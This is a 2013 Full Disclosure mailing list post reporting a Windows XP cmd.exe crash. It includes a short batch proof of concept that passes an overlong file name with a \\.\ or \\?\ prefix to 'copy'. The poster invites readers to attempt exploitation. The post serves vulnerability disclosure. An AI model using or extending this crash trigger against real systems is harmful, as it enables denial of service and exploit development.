Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Windows XP cmd.exe crash
From: Pedro Laguna <pedlagdur () hotmail co uk>
Date: Fri, 28 Jun 2013 14:17:43 +0100

Ey list! Just something quick and funny crash I found long time ago and it may give some of you something to check this
weekend.
Windows XP cmd.exe crash when trying to copy files with a very long name. The following BATCH file can crash the
cmd.exe process:
----------------------------------- crash.bat -------------------------------------- () echo offecho test >
data.txtcopy "%CD%"\data.txt
\\.\C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txtREM
 copy "%CD%"\data.txt
\\?\C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt----------------------------------
It only happens with "copy" but not with "move" command and with both \\.\ and \\?\ prefixes. I'm not an expert on
these fields so I don't know if it will be possible to exploit it, maybe some of you with crazy kung fu skills can do
it. If not, it's just a weird behaviour for the cmd.exe and given that is less than a year to the end of life of the
Windows XP cannot see any harm sharing it.
Ta!
--
Pedro Laguna